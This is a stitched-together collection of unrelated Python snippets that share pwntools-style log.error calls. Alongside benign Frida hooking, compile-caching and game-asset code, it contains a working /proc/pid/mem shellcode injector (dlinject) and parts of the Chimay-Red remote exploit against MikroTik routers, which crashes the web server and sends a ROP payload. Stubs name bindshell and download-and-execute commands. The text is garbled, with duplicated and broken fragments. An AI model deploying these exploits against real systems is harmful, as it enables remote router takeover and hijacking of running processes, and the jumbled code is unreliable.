def main(target_process): with open(CONFIG_FILE_NAME) as j: config = json.load(j) try: session = frida.get_usb_device().attach(target_process) except frida.ServerNotRunningError: try: log.error("Please start frida server first") except: sys.exit(-1) except frida.TimedOutError: try: log.error("Frida timeout...") except: sys.exit(-1) PATH = "" if config["settings"]["write_results"]: PATH = os.path.join(PATH, "results", sys.argv[1]) if not os.path.exists(PATH): os.makedirs(PATH) runnr = len([x for x in os.listdir(PATH) if os.path.isdir(os.path.join(PATH,x))]) PATH = os.path.join(PATH, "run_" + str(runnr)) if not os.path.exists(PATH): os.makedirs(PATH) hook_classes(session, config, PATH) sys.stdin.read()
def _compile(code, werror, flags, libs): digest = md5sumhex(code + str(werror) + str(flags) + str(libs)) if digest in __cache: return __cache[digest] sopath = os.path.join(__tempdir, digest + '.so') try: if os.path.exists(sopath): return CDDL(sopath) except: pass cpath = os.path.join(__tempdir, digest + '.c') with open(cpath, 'w') as f: f.write(code) flags += [ '-fPIC', '-shared', '-O3', '-march=native', '-mtune=native', '-Wall' ] if werror: flags.append('-Werror') cmd = ['gcc'] + flags + ['-o', sopath, cpath] + libs p = Popen(cmd, stderr=PIPE) _, s = p.communicate() s = s.replace(cpath + ':', '').replace(cpath, '') if p.returncode <> 0: log.error('GCC error (%s):' % cpath) log.trace(s) sys.exit(p.returncode) elif s <> '': log.warning('GCC warning (%s):' % cpath) log.trace(s) return CDLL(sopath)
def _compile(code, werror, flags, libs): digest = md5sumhex(code + str(werror) + str(flags) + str(libs)) if digest in __cache: return __cache[digest] sopath = os.path.join(__tempdir, digest + '.so') try: if os.path.exists(sopath): return CDDL(sopath) except: pass cpath = os.path.join(__tempdir, digest + '.c') with open(cpath, 'w') as f: f.write(code) flags += ['-fPIC', '-shared', '-O3', '-march=native', '-mtune=native', '-Wall'] if werror: flags.append('-Werror') cmd = ['gcc'] + flags + ['-o', sopath, cpath] + libs p = Popen(cmd, stderr = PIPE) _, s = p.communicate() s = s.replace(cpath + ':', '').replace(cpath, '') if p.returncode <> 0: log.error('GCC error (%s):' % cpath) log.trace(s) sys.exit(p.returncode) elif s <> '': log.warning('GCC warning (%s):' % cpath) log.trace(s) return CDLL(sopath)
def fastboot_reboot(self): cmd = "/usr/bin/fastboot -s %s reboot" % self.serial result = self.host_shell(cmd) if "Finished. Total time:" in result: log.success("fastboot reboot succeed.") sleep(10) else: log.error("fastboot reboot failed.")
def extract(): os.makedirs(config.LAYER_DUMP_DIR, exist_ok=True) if not os.path.isdir(config.UNPACKED_ASSETS_DIR): log.error(f"Configured UNPACKED_ASSETS_DIR does not exist.\n" f"Make sure you run the unpack task first.") map_dir = config.UNPACKED_ASSETS_DIR + "/Maps" with log.progress("-- Extracting Map") as progress: map_data = extract_map(map_dir, progress) with log.progress("-- Writing RAAS data to file"): with open(f"raas-data-auto.yaml", "w") as f: f.write(yaml.dump(map_data, sort_keys=True, indent=4))
def tiles(): os.makedirs(config.TILE_MAP_DIR, exist_ok=True) if not os.path.isdir(config.FULLSIZE_MAP_DIR): log.error(f"Configured FULLSIZE_MAP_DIR does not exist.\n" f"Make sure you run the extract task first.") with ThreadPoolExecutor() as executor: for name in os.listdir(config.FULLSIZE_MAP_DIR): # ignore non-tga files if not name.endswith(".tga"): continue # remove extension name, _, _ = name.rpartition(".tga") # We need to create a new user and group inside the Docker container, # otherwise the generated files will be owned by root on our host system, # which is annoying. # generate-map-tiles.sh takes care of that command = [ f"docker", f"run", f"--mount", f"type=bind,source={os.path.abspath(config.FULLSIZE_MAP_DIR)},target=/mnt/map-fullsize", f"--mount", f"type=bind,source={os.path.abspath(config.TILE_MAP_DIR)},target=/mnt/map-tiles", f"--mount", f"type=bind,source={os.getcwd()},target=/mnt/cwd", f"osgeo/gdal", f"sh", f"/mnt/cwd/generate-map-tiles.sh", f"{os.getuid()}", f"{os.getgid()}", f"{name}", ] if context.log_level <= logging.DEBUG: pprint(command) sys.stdout.flush() stdout = sys.stdout stderr = sys.stderr else: stdout = subprocess.DEVNULL stderr = subprocess.DEVNULL executor.submit(extract_minimap, name, command, stdout, stderr)
def main(): try: while True: menu() clear() except KeyboardInterrupt: clear() print( "\r\nYou pressed ctrl^C! If you want to exit, please type 'exit' or '5' to exit the script!\r\n" ) main() except Exception as ex: try: log.error(f"[-] {ex}") exit(-1) except: exit(-1)
def monitor(self): while True: sleep(10) try: # make sure the state .. # keep the device root, selinux disabled, tombstone. # kill tombstoned might miss some crashes. self.reset() self.check_fuzzer_status() self.check_logcat_status() self.check_restart_device_script_status() self.sync_log() except Exception as e: print("device %s exception: %s." % (self.serial, str(e))) print("please see the corresponding log.") log.error("device %s exception: %s." % (self.serial, str(e))) log.error(traceback.format_exc())
def split_cmdline(cmdline): WHITE_WORD = 0 WORD_START = 1 QUOTATION_START = 2 args = list() state = WHITE_WORD word_start = -1 i = 0 while i < len(cmdline): if state == WHITE_WORD: if cmdline[i] == "\"": state = QUOTATION_START word_start = i else: state = WORD_START word_start = i i += 1 elif state == QUOTATION_START: if cmdline[i] == "\"": new_arg = cmdline[word_start + 1:i] args.append(new_arg) state = WHITE_WORD i += 1 elif state == WORD_START: if cmdline[i] == " ": new_arg = cmdline[word_start:i] args.append(new_arg) state = WHITE_WORD i += 1 if state == QUOTATION_START: log.error("Wrong quotation in cmdline") return None elif state == WORD_START: args.append(cmdline[word_start:]) return args
def wikipedia_example(): p = 61 n = 3233 q = n / p if q != 53: log.error('!!!') e = 17 d = get_private_key_from_public(p, q, e) if d != 2753: log.error('!!!') c = 855 m1 = pow(c, d, n) if m != 123: log.error('!!!') log.info(m1) log.info('yay!')
def do_madlib(io,answer = None): io.recvuntil(FEASIBLE_PROMPT) if answer: io.sendline('Y') result = io.recvline(keepends=False) if result == FILL_IN: io.recvuntil(': ') io.sendline(str(answer)) result = io.recvline(keepends = False) if result == CORRECT_MESSAGE: pass else: log.error(result) else: log.error(result) else: io.sendline('N') result = io.recvline(keepends=False) if result == CORRECT_MESSAGE: pass else: log.error(result)
for p in ps: all_keys += p.keys() all_keys = list(set(all_keys)) for key in all_keys: index = 0 for param in params: tocheck = params[:index] + params[index + 1:] listing = [] for c in tocheck: if c.get(key): listing.append(c[key]) # If you think hard enough, this makes sense: listing = [i for j in listing for i in j] if params[index].get(key): for x in params[index][key]: if x in listing: log.warn("Same {} found in different runs".format(key)) index = index + 1 if __name__ == '__main__': if len(sys.argv) != 3: try: log.error("Usage: %s <process name or PID> <function name>" % __file__) except: sys.exit(-1) main(sys.argv[1], sys.argv[2])
def ssl_download_and_exe(vector, *args): log.error( "Command: ssl_download_and_exe currently not implemented in this version. Coming in June!" )
def get_functions(tree): functions = [] for e in tree: if isinstance(e.type, pycparser.c_ast.FuncDecl): f = get_type(e) f.isfunct = True f.name = e.name for ee in e.type.args.params: p = get_type(ee) p.name = ee.name f.params.append(p) functions.append(f) return functions def main(filename): ast = parse_file(filename, use_cpp=True, cpp_args="-I" + FAKE_LIBC) functions = get_functions(ast.ext) for f in functions: # print_function(f) export_function(f) if __name__ == '__main__': if len(sys.argv) != 2: try: log.error("Usage: %s <path_to_file>" % __file__) except: sys.exit(-1) main(sys.argv[1])
def main(target): global PATH log.info("Going to analyze {}".format(target)) try: session = frida.get_usb_device().attach(target) except frida.ServerNotRunningError: try: log.error("Please start frida server first") except: sys.exit(-1) except frida.TimedOutError: try: log.error("Frida timeout...") except: sys.exit(-1) with open("config/modules.json") as j: MODULES = json.load(j) log.info("Will look at: {}".format(', '.join(MODULES))) PATH = "results/" + sys.argv[1] + "/" if not os.path.exists(PATH): os.makedirs(PATH) runnr = len([x for x in os.listdir(PATH) if os.path.isdir(PATH + x)]) PATH += "run_" PATH += str(runnr) PATH += "/" if not os.path.exists(PATH): os.makedirs(PATH) # Get only needed Modules modules = session.enumerate_modules() tmp = [] for M in MODULES: tmp.append(modules[[x.name for x in modules].index(M)]) modules = tmp functions = [] for x in modules: functions += x.enumerate_exports() log.info("Found {} functions".format(len(functions))) # Which functions do I need to look at? for filename in os.listdir("functions/"): with open("functions/" + filename) as j: FUNCTIONS.append(json.load(j)) lookup = [x["name"] for x in FUNCTIONS] log.info("Will look for: {}".format(', '.join(lookup))) for f in lookup: try: result = functions[[x.name for x in functions].index(f)] except ValueError: log.warn("Function " + f + "not found") continue log.info("Found {} in {} @ {}".format(result.name, result.module.name, hex(result.absolute_address))) script = session.create_script( genscript(FUNCTIONS[lookup.index(f)], result)) script.on('message', on_message) script.load() log.info("Injected all needed scripts, now listening") sys.stdin.read()
def custom_shellcode(vector, *args): log.error( "Command: custom_shellcode currently not implemented in this version. Coming in June" )
def bindshell(vector, *args): log.error( "Command: bindshell currently not implemented in this version")
def __setitem__(self, item, value): if item not in self.FILE_struct: log.error('io_file: Unknown item %s' % item) super(IO_FILE_plus_struct, self).__setitem__(item, value)
def die(msg): log.error(msg) exit(1)
def dlinject(pid, lib_path, stopmethod="sigstop"): with open(f"/proc/{pid}/maps") as maps_file: for line in maps_file.readlines(): ld_path = line.split()[-1] if re.match(r".*/ld-.*\.so", ld_path): ld_base = int(line.split("-")[0], 16) break else: log.error("Couldn't find ld.so! (we need it for _dl_open)") log.info("ld.so found: " + repr(ld_path)) log.info("ld.so base: " + hex(ld_base)) dl_open_offset = lookup_elf_symbol(ld_path, "_dl_open") if not dl_open_offset: log.error("Unable to locate _dl_open symbol") dl_open_addr = ld_base + dl_open_offset log.info("_dl_open: " + hex(dl_open_addr)) if stopmethod == "sigstop": log.info("Sending SIGSTOP") os.kill(pid, signal.SIGSTOP) while True: with open(f"/proc/{pid}/stat") as stat_file: state = stat_file.read().split(" ")[2] if state in ["T", "t"]: break log.info("Waiting for process to stop...") time.sleep(0.1) elif stopmethod == "cgroup_freeze": freeze_dir = "/sys/fs/cgroup/freezer/dlinject_" + os.urandom(8).hex() os.mkdir(freeze_dir) with open(freeze_dir + "/tasks", "w") as task_file: task_file.write(str(pid)) with open(freeze_dir + "/freezer.state", "w") as state_file: state_file.write("FROZEN\n") while True: with open(freeze_dir + "/freezer.state") as state_file: if state_file.read().strip() == "FROZEN": break log.info("Waiting for process to freeze...") time.sleep(0.1) else: log.warn("We're not going to stop the process first!") with open(f"/proc/{pid}/syscall") as syscall_file: syscall_vals = syscall_file.read().split(" ") rip = int(syscall_vals[-1][2:], 16) rsp = int(syscall_vals[-2][2:], 16) log.info(f"RIP: {hex(rip)}") log.info(f"RSP: {hex(rsp)}") stage2_path = f"/tmp/stage2_{os.urandom(8).hex()}.bin" shellcode = asm(fr""" // push all the things pushf push rax push rbx push rcx push rdx push rbp push rsi push rdi push r8 push r9 push r10 push r11 push r12 push r13 push r14 push r15 // Open stage2 file mov rax, 2 # SYS_OPEN lea rdi, path[rip] # path xor rsi, rsi # flags (O_RDONLY) xor rdx, rdx # mode syscall mov r14, rax # save the fd for later // mmap it mov rax, 9 # SYS_MMAP xor rdi, rdi # addr mov rsi, {STAGE2_SIZE} # len mov rdx, 0x7 # prot (rwx) mov r10, 0x2 # flags (MAP_PRIVATE) mov r8, r14 # fd xor r9, r9 # off syscall mov r15, rax # save mmap addr // close the file mov rax, 3 # SYS_CLOSE mov rdi, r14 # fd syscall // delete the file (not exactly necessary) mov rax, 87 # SYS_UNLINK lea rdi, path[rip] # path syscall // jump to stage2 jmp r15 path: .ascii "{stage2_path}\0" """) with open(f"/proc/{pid}/mem", "wb+") as mem: # back up the code we're about to overwrite mem.seek(rip) code_backup = mem.read(len(shellcode)) # back up the part of the stack that the shellcode will clobber mem.seek(rsp - STACK_BACKUP_SIZE) stack_backup = mem.read(STACK_BACKUP_SIZE) # write the primary shellcode mem.seek(rip) mem.write(shellcode) log.info("Wrote first stage shellcode") stage2 = asm(fr""" cld fxsave moar_regs[rip] // Open /proc/self/mem mov rax, 2 # SYS_OPEN lea rdi, proc_self_mem[rip] # path mov rsi, 2 # flags (O_RDWR) xor rdx, rdx # mode syscall mov r15, rax # save the fd for later // seek to code mov rax, 8 # SYS_LSEEK mov rdi, r15 # fd mov rsi, {rip} # offset xor rdx, rdx # whence (SEEK_SET) syscall // restore code mov rax, 1 # SYS_WRITE mov rdi, r15 # fd lea rsi, old_code[rip] # buf mov rdx, {len(code_backup)} # count syscall // close /proc/self/mem mov rax, 3 # SYS_CLOSE mov rdi, r15 # fd syscall // move pushed regs to our new stack lea rdi, new_stack_base[rip-{STACK_BACKUP_SIZE}] mov rsi, {rsp-STACK_BACKUP_SIZE} mov rcx, {STACK_BACKUP_SIZE} rep movsb // restore original stack mov rdi, {rsp-STACK_BACKUP_SIZE} lea rsi, old_stack[rip] mov rcx, {STACK_BACKUP_SIZE} rep movsb lea rsp, new_stack_base[rip-{STACK_BACKUP_SIZE}] // call _dl_open (https://github.com/lattera/glibc/blob/895ef79e04a953cac1493863bcae29ad85657ee1/elf/dl-open.c#L529) lea rdi, lib_path[rip] # file mov rsi, 2 # mode (RTLD_NOW) xor rcx, rcx # nsid (LM_ID_BASE) (could maybe use LM_ID_NEWLM (-1)) mov rax, {dl_open_addr} call rax fxrstor moar_regs[rip] pop r15 pop r14 pop r13 pop r12 pop r11 pop r10 pop r9 pop r8 pop rdi pop rsi pop rbp pop rdx pop rcx pop rdx pop rax popf mov rsp, {rsp} jmp old_rip[rip] old_rip: .quad {rip} old_code: .byte {",".join(map(str, code_backup))} old_stack: .byte {",".join(map(str, stack_backup))} .align 16 moar_regs: .space 512 lib_path: .ascii "{lib_path}\0" proc_self_mem: .ascii "/proc/self/mem\0" new_stack: .balign 0x8000 new_stack_base: """) with open(stage2_path, "wb") as stage2_file: os.chmod(stage2_path, 0o666) stage2_file.write(stage2) log.info(f"Wrote stage2 to {repr(stage2_path)}") if stopmethod == "sigstop": log.info("Continuing process...") os.kill(pid, signal.SIGCONT) elif stopmethod == "cgroup_freeze": log.info("Thawing process...") with open(freeze_dir + "/freezer.state", "w") as state_file: state_file.write("THAWED\n") # put the task back in the root cgroup with open("/sys/fs/cgroup/freezer/tasks", "w") as task_file: task_file.write(str(pid)) # cleanup os.rmdir(freeze_dir) log.success("Done!")
def log_error(self, msg): log.error('{}: {}'.format(self._class_name(), msg))
for f in lookup: try: result = functions[[x.name for x in functions].index(f)] except ValueError: log.warn("Function " + f + "not found") continue log.info("Found {} in {} @ {}".format(result.name, result.module.name, hex(result.absolute_address))) script = session.create_script( genscript(FUNCTIONS[lookup.index(f)], result)) script.on('message', on_message) script.load() log.info("Injected all needed scripts, now listening") sys.stdin.read() if __name__ == '__main__': if len(sys.argv) != 2: try: log.error("Usage: %s <process name or PID>" % __file__) except: sys.exit(-1) try: target_process = int(sys.argv[1]) except ValueError: target_process = sys.argv[1] main(target_process)
def write_devel_read_userfile(vector, *args): log.error( "Command: write_devel_read_userfile currently not implemented in this version. Coming in June!" )
if ARGS.vector not in VECTORS: raise RuntimeError("vector: {} is not available".format( ARGS.vector)) if ARGS.vector.startswith("build"): if not ARGS.binary: raise RuntimeError( "build vector specified without --binary filepath") if not os.path.isfile(ARGS.binary): raise RuntimeError("supplied binary could not be found!\n") # ARCHITECTURE ARG CHECKING if not ARGS.architecture: log.warning("No architecture specified, defaulting to ({})".format( SUPPORTED_ARCHS[0])) elif ARGS.architecture not in SUPPORTED_ARCHS: log.error("Unsupported architecture specified") # TARGET NAMESPACE SETTING, YEA I USED A GLOBAL NAMESPACE, SUE ME for argname, value in vars(ARGS).items(): setattr(TARGET, argname, value) except RuntimeError as exc: raise PrintHelpException(exc) # PROFILING DETECTION if PROFILING: raise SystemExit(profile_main()) else: raise SystemExit(main()) else: # Chimay-Red is not a library! raise ImportError
def throw_v6(vector, command): threads = 2 connections = list() ropper = MikroROP(context.binary, command=command) if not connectable(TARGET.rhost): log.error("Cannot communicate with target, you sure it's up?") TARGET.version = get_remote_version() if not exploitable(TARGET.version): log.error("{} is not exploitable!".format(TARGET.rhost)) if not TARGET.architecture: try: # attempt to remotely retreive the target architecture if available target location available in route table for route in get_system_routes(): if check_cidr_overlap( route, "{}.0/24".format(".".join( TARGET.rhost.split(".")[:-1]))): log.success( "Found target in route table range: {}/24".format( route)) TARGET.architecture = get_remote_architecture(TARGET.rhost) break except GeneratorExit: TARGET.architecture = "x86" log.warning( "Cannot determine remote target architecture, no route table match" ) log.warning("\tTarget Architecture: [{}] (Fallback)".format( TARGET.architecture)) except (StopIteration, KeyboardInterrupt): TARGET.architecture = "x86" log.warning("Skipped architecture detection as requested") log.warning("\tTarget Architecture: [{}] (Fallback)".format( TARGET.architecture)) log.info("Beginning chimay-red [throw_v6] with specs:" "\nTarget: '{target: >5}'" "\nCommand: '{command: >5}'" "\nVector: '{vector: >5}'" "\nVersion: '{version: >5}'" "\nArchitecture: '{architecture}'" "".format(target=TARGET.rhost, command=command, vector=vector, version=TARGET.version, architecture=TARGET.architecture)) try: if vector == "mikrodb": arch_offsets = offsets = None # instantiate MikroDB offset lookup helper lookuper = mikrodb.MikroDb("lite://mikro.db") if not TARGET.version: log.error( "Could not determinte remote version, cannot proceed for current vector." ) # fetch offsets from database given architecture and version if not lookuper.get("www"): log.error( "Could not locate www table in database, please build database." ) else: arch_offsets = lookuper["www"].get(TARGET.architecture) if not arch_offsets: log.error( "Could not locate architecture: [{}] in database, please rebuild the database." .format(TARGET.architecture)) if not arch_offsets.get(TARGET.version): log.error( "Could not locate version: [{}] in database, please rebuild the database." .format(TARGET.version)) if not arch_offsets[TARGET.version].get("offsets"): log.error( "Could not locate offsets for architecture: [{}] and version: [{}] in database, please" " rebuild the database.".format(TARGET.architecture, TARGET.version)) else: offsets = arch_offsets[TARGET.version]["offsets"] offsets = namedtuple( "offsets", sorted(offsets))(**offsets) # Quick lil conversion ropper.build_ropchain(offsets=offsets) elif vector == "leak": log.info("Attempting to leak pointers from remote process map...") # instantiate memory leaker helper object class leaker = MikroLeaker(context) leaker.leak() leaker.analyze_leaks() elif vector == "build" or "default": ropper.build_ropchain() else: log.error("developer error occured selecting the proper vector!") log.info("Crashing target initially for reliability sake...") while not Command(command="do_crash"): continue with log.progress( "Successfully crashed! Target webserver will be back up in" ) as progress: for tick in reversed(range(1, 4)): progress.status("{0} seconds...".format(tick)) time.sleep(1) progress.success("UP") log.info("Allocating {0} threads for main payload...".format(threads)) [ connections.append(create_socket(TARGET.rhost, TARGET.rport)) for _ in range(threads) ] log.info( "POST content_length header on thread0 to overwrite thread1_stacksize + skip_size + payload_size" ) connections[0].send( craft_post_header(length=0x20000 + 0x1000 + len(ropper.chain) + 1)) time.sleep(0.5) log.info( "Incrementing POST read() data buffer pointer on thread0 to overwrite return address on thread1" ) connections[0].send(b'\x90' * (((0x1000 - 0x10) & 0xFFFFFF0) - (context.bits >> 3))) time.sleep(0.5) log.info( "POST content_length header on thread1 to allocate maximum space for payload: ({}) bytes" .format(len(ropper.chain) + 1)) connections[1].send(craft_post_header(length=len(ropper.chain) + 1)) time.sleep(0.5) log.info("Sending ROP payload...") connections[0].send(ropper.chain) time.sleep(0.5) log.info("Closing connections sequentially to trigger execution...") [connection.close() for connection in connections] except KeyboardInterrupt: raise SystemExit(log.warning("SIGINT received, exiting gracefully...")) except Exception: raise return True